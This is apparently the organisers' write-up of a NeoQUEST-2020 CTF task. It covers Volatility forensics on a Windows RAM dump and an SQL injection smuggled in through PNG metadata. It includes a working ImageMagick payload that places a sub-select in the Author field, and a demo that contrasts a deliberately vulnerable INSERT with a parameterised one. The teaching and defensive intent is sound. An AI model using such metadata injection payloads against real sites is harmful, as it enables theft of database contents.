Forensics, SQL injection and a long-suffering cat: analysis of task No. 3 of the NeoQUEST-2020 online stage



Today we will look at the most controversial task of NeoQUEST-2020: its first part holds the record for the number of participants who solved it, while the second part yielded to only a few. What is so special about it? Read on under the cut!


Have you ever had to investigate a RAM dump? Do you know how many interesting things you can get from there? (spoiler: everything, including the results of running scripts, recent photos, as well as browser history).
What about exotic SQL injections? You upload a picture to a site and get back information from a closed database: isn't that the perfect crime?
In the first part of the article we will look at tools for analysing a memory dump and learn how to extract the information we need from it; in the second part we will show, step by step, how image tags are manipulated for a tricky injection :)

So, the task is to download an archive containing a 1 GB binary file with the telling name memdump.bin, from which we can assume that it is a RAM dump. To investigate it we will use the Volatility framework. Volatility supports a variety of plugins that make it easy to search the dump and extract all kinds of information that an analyst will find useful. First, run the imageinfo command to get information about the dump:



Judging by the output of the imageinfo command, we are dealing with a Windows 7 memory dump. Next, let's look at the list of processes that were running on the system at the time the dump was taken, using the pslist command:



Several interesting processes can be seen in this list. Let's start our investigation with the chrome.exe process: you can always find something intriguing in the browser. There are additional Volatility plugins that automate the extraction of information from processes. For example, the chromehistory plugin lets us pull the browser's visit history out of the RAM dump:



Several interesting things can be noticed in the Chrome history at once. First, a link to the second part of the assignment, as well as search queries about metadata in PNG images, which is also a hint for the second part, but we will come back to that later. At the current stage we are interested in the queries about a promotional code for a discount on the site and about pdf files, which hint at what to search for next (the running Acrobat Reader may also point us in that direction). Let's try to find pdf documents in the dump using the filescan command:



We're in luck! It looks like there is a promo.pdf in the dump. Let's try to pull it out using the dumpfiles command:



At this stage minor difficulties may arise, because some pdf viewers may not recognise the file we have just extracted (you just need to delete the extra bytes at the end of the file). But are we really afraid of a few extra bytes? :) Finally, we open the document and see a QR code; reading it gives us the flag for the first part of the task (and at the same time the promotional code for receiving a gift from the NeoQUEST team: we give memorable prizes to all participants who completed at least one assignment!).
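A small helper for the "extra bytes" problem mentioned above, added here as an example and not part of the original write-up or of Volatility: a file carved with dumpfiles is padded to the end of its last memory page, so the script cuts everything after the final %%EOF marker. The sample bytes are constructed; the file names are placeholders.

```python
import re

PDF_EOF = b"%%EOF"


def trim_pdf_tail(data: bytes) -> bytes:
    """Return the PDF truncated right after its last %%EOF marker.

    Keeps the single line terminator (\\r, \\n or \\r\\n) that may follow
    the marker, and raises if the data does not look like a complete PDF.
    """
    if not data.startswith(b"%PDF-"):
        raise ValueError("missing %PDF- header; this is not a carved PDF")
    idx = data.rfind(PDF_EOF)
    if idx < 0:
        raise ValueError("no %%EOF marker found; the carved file is incomplete")
    end = idx + len(PDF_EOF)
    m = re.match(rb"\r\n|\r|\n", data[end:end + 2])
    if m:
        end += m.end()
    return data[:end]


def trim_pdf_file(src: str, dst: str) -> int:
    """Write the trimmed copy of src to dst and return how many bytes were dropped."""
    with open(src, "rb") as f:
        data = f.read()
    trimmed = trim_pdf_tail(data)
    with open(dst, "wb") as f:
        f.write(trimmed)
    return len(data) - len(trimmed)


# Constructed stand-in for a carved file: a tiny PDF followed by page padding.
SAMPLE_PDF = b"%PDF-1.4\n1 0 obj\n<< >>\nendobj\ntrailer\n<< >>\n%%EOF\n"
SAMPLE_CARVED = SAMPLE_PDF + b"\x00" * 4096

if __name__ == "__main__":
    # placeholder names: replace with the file produced by dumpfiles
    print("bytes removed:", len(SAMPLE_CARVED) - len(trim_pdf_tail(SAMPLE_CARVED)))
```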



Next, let's try to get the second flag. We return to the site whose link we found in the browser history. To access the site you need to enter a promotional code. We recall the browser search history and the description in the document itself (USE THIS TO JOIN), from which we can assume that the first flag is the promotional code we need. We enter it into the field and land on a page that offers us to upload a picture:



Judging by how often the site froze, our participants decided to verify experimentally that every possible type of document could be uploaded. Some time later we understand that only PNG images can be uploaded to the site. The next puzzle is the message "Not enough data to store this image, sorry!", which appears when you try to upload a picture.

Returning to the browser history, we recall the queries of the form "add metadata to png file". By simple inference we conclude that, most likely, certain values must be present in the metadata for an image to be accepted by the site. You can start by exploring the PNG format (a description of the format is available, for example, here). First, check the list of standard keywords for PNG image metadata, for example "Author", "Description", etc. Using, for example, the convert utility from the ImageMagick suite, add metadata to a test image:

convert test.png -set 'Title' '1' -set 'Author' '2' -set 'Description' '3' -set 'Copyright' '4' -set 'Creation Time' '5' -set 'Software' '6' -set 'Disclaimer' '7' -set 'Warning' '8' -set 'Source' '9' -set 'Comment' '0' out.png

We try to upload the resulting image to the site and enjoy the success:



It turns out that the necessary metadata fields are Title, Description, Author and Copyright.
A hint for this, by the way, can also be found in the memory dump: you can find the mention of the mr_cat.png file using volatility.
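To see what the convert command above actually writes into the file, and what the site's check evidently looked for, here is a pure-Python reader and writer for PNG tEXt chunks, added as an example (not the task's or ImageMagick's code). It verifies chunk CRCs, adds the four required keywords, and reports which are missing; the 1x1 image is constructed inline.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
REQUIRED_KEYS = {"Title", "Description", "Author", "Copyright"}  # as found on the site


def _chunk(ctype: bytes, body: bytes) -> bytes:
    """Serialise one chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def iter_chunks(png: bytes):
    """Yield (type, data) for every chunk, rejecting bad signatures or CRCs."""
    if not png.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos < len(png):
        (length,) = struct.unpack(">I", png[pos:pos + 4])
        ctype = png[pos + 4:pos + 8]
        body = png[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", png[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC in {ctype!r} chunk")
        yield ctype, body
        pos += 12 + length


def read_text(png: bytes) -> dict:
    """Collect tEXt chunks (keyword NUL text, Latin-1) into a dict."""
    meta = {}
    for ctype, body in iter_chunks(png):
        if ctype == b"tEXt":
            key, _, val = body.partition(b"\x00")
            meta[key.decode("latin-1")] = val.decode("latin-1")
    return meta


def add_text(png: bytes, meta: dict) -> bytes:
    """Return a copy with one tEXt chunk per key inserted right after IHDR."""
    out = PNG_SIG
    for ctype, body in iter_chunks(png):
        out += _chunk(ctype, body)
        if ctype == b"IHDR":
            for key, val in meta.items():
                out += _chunk(b"tEXt", key.encode("latin-1") + b"\x00" + val.encode("latin-1"))
    return out


def missing_fields(png: bytes) -> set:
    """The check the upload form appears to apply: which required keywords are absent."""
    return REQUIRED_KEYS - set(read_text(png))


# Constructed 1x1 greyscale PNG (IHDR, one filtered scanline in IDAT, IEND).
TEST_PNG = (PNG_SIG + _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
            + _chunk(b"IDAT", zlib.compress(b"\x00\x00")) + _chunk(b"IEND", b""))
```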



Our participants decided that the injection into the site had to be carried out with the help of Mr. Cat (a lot of messages arrived in our mail with Mr. Cat compressed, inverted, mirrored and otherwise disfigured), but the cat had nothing to do with it! He simply distracts the participants and hints: look at me, there is something interesting inside! The image survived only partially in the dump; however, in what remains of it you can notice the required metadata fields, already filled in:



Onwards: now we can upload files to the site; but what does that give us, and where do we look for the flag? It is logical to assume that, since metadata is required for an upload, the metadata is somehow used when storing the uploaded files (for example, as keys in a database). Hooray! We are getting to the dessert: we need to check the site for SQL injection. We find that if a double quote (") is placed in one of the parameters, the site reports an error instead of uploading the image:



Now we can see the SQL query itself and understand which fields we can manipulate in order to construct an injection that extracts data from the underlying database. As for the location of the flag, it is logical to check the very first image uploaded into the database. When working with the injection, you should also keep in mind that the query being executed is an INSERT. This forces you to construct specific queries, because you cannot SELECT directly from the same table into which you are inserting within the same INSERT statement.

Let's construct a query that pulls out the Description of the first image in the database:

convert test1.png -set 'Title' '1' -set 'Author' '", (SELECT description FROM (SELECT * FROM picture) AS x LIMIT 0,1)) -- ' -set 'Description' '3' -set 'Copyright' '4' test.png

Upload the resulting image to the site and get the description in the Copyright field, which is the flag:
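The shape of the bug behind the second flag, reproduced on SQLite as an added example (not the site's own code) so that the vulnerable and the fixed handler can be compared side by side: store_vulnerable() pastes the PNG metadata into the INSERT by string formatting, as the site evidently did, while store_safe() binds the same values as parameters. The schema, the "first image" row and the single-quoted literals (the site used double quotes) are assumptions; SQLite also has no restriction on sub-selecting from the table being inserted into, so the derived-table trick from the article is not needed here.

```python
import sqlite3

COLUMNS = "INSERT INTO picture (title, author, description, copyright) "


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE picture (id INTEGER PRIMARY KEY, title TEXT, "
               "author TEXT, description TEXT, copyright TEXT)")
    # Constructed "first image"; its description stands in for the flag.
    db.execute(COLUMNS + "VALUES ('first', 'admin', 'FLAG{constructed-placeholder}', 'c')")
    db.commit()
    return db


def store_vulnerable(db: sqlite3.Connection, meta: dict) -> int:
    # Metadata text becomes part of the SQL itself: a quote in any field
    # changes the statement instead of being stored as data.
    sql = (COLUMNS + f"VALUES ('{meta['Title']}', '{meta['Author']}', "
           f"'{meta['Description']}', '{meta['Copyright']}')")
    return db.execute(sql).lastrowid


def store_safe(db: sqlite3.Connection, meta: dict) -> int:
    # Parameter binding: the driver passes the values separately from the
    # statement, so the same payload is stored verbatim as the author name.
    cur = db.execute(COLUMNS + "VALUES (?, ?, ?, ?)",
                     (meta["Title"], meta["Author"], meta["Description"], meta["Copyright"]))
    return cur.lastrowid


def fetch(db: sqlite3.Connection, rowid: int) -> tuple:
    """Return (author, copyright) of a stored picture, as the site's page showed it."""
    return db.execute("SELECT author, copyright FROM picture WHERE id = ?", (rowid,)).fetchone()


# Author value in the spirit of the article: it closes its own literal, supplies
# the remaining columns itself and comments out the rest, so the first image's
# description lands in the Copyright column of the newly stored row.
PAYLOAD = "', '', (SELECT description FROM picture ORDER BY id LIMIT 1)) -- "
META = {"Title": "1", "Author": PAYLOAD, "Description": "3", "Copyright": "4"}

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", fetch(db, store_vulnerable(db, META)))
    print("safe:      ", fetch(db, store_safe(db, META)))
```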



Hooray, task completed! We hope we have convinced everyone, for the millionth time, to double-check user input, and also to guard your RAM like the apple of your eye against anyone dumping it :)
Let's finish the article with a quote from the great sages:

